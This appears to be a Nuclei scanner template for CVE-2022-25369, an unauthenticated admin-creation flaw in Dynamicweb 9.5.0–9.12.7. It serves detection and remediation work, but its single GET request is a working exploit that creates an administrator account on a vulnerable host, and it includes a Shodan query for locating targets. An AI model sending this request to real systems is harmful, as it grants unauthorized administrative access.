id: CVE-2022-25369

info:
  name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation
  author: pdteam
  severity: critical
  description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.
  remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.'
  reference:
    - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25369
    cwe-id: CWE-425
  metadata:
    max-request: 1
    shodan-query: http.component:"Dynamicweb"
  tags: cve2022,cve,dynamicweb,rce,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Success": true'
          - '"Success":true'
        condition: or

      - type: word
        part: header
        words:
          - 'application/json'
          - 'ASP.NET_SessionId'
        condition: and
        case-insensitive: true

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b7f35452dbfcd48834f3400c73dcf201cc3872265ccf60c523480c1d6cee56fd02202c82c05a62a41f20bff8ca897e0fbf249b14b87a0da1aa8d03aebb40c626803d:922c64590222798bb761d5b6d8e72950